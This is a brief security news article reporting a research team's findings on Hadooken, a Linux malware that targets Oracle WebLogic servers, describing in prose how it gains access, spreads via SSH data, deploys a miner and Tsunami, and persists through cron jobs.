New Linux malware Hadooken targets Oracle WebLogic servers

Aqua Security’s Nautilus research team recently reported the emergence of a new Linux malware called Hadooken. This malware specifically targets Oracle WebLogic servers to deploy additional malicious software and extract credentials for lateral movement within compromised networks.
The Hadooken malware is disseminated through attacks that exploit vulnerabilities associated with weak passwords to gain initial access. Once attackers infiltrate a WebLogic server, they download a shell script and a Python script, both of which are specifically designed to retrieve and execute the malware. The dual use of these scripts indicates a strategic approach to ensuring successful execution on the compromised server.
These scripts download the malware into a temporary directory and subsequently remove it after execution. Further analysis has demonstrated that the shell script systematically iterates through directories that contain Secure Shell (SSH) data, utilizing the collected information to identify and attack known servers, thereby facilitating lateral movement within the network. This propagation mechanism enables Hadooken to spread throughout the organization’s network and associated environments. Moreover, the attackers engage in log-clearing activities to obfuscate their actions. Upon execution, Hadooken deploys two distinct files: a crypto-miner that is allocated across three varying paths under different names, and the Tsunami malware, which is stored in a temporary folder with a randomly generated identifier. While there is currently no evidence suggesting that the attackers are actively employing Tsunami during this phase of the attack, Aqua Security has noted its potential utilization in subsequent stages. To ensure persistence, the malware establishes multiple cron jobs, each differentiated by distinct names, execution frequencies, and directories for script storage. The investigation has also identified two IP addresses associated with the downloading of the Hadooken malware. One IP address, registered in Germany, has been previously connected to cybercrime organizations such as TeamTNT and Gang 8220. The second IP address, registered in Russia, was found to be inactive.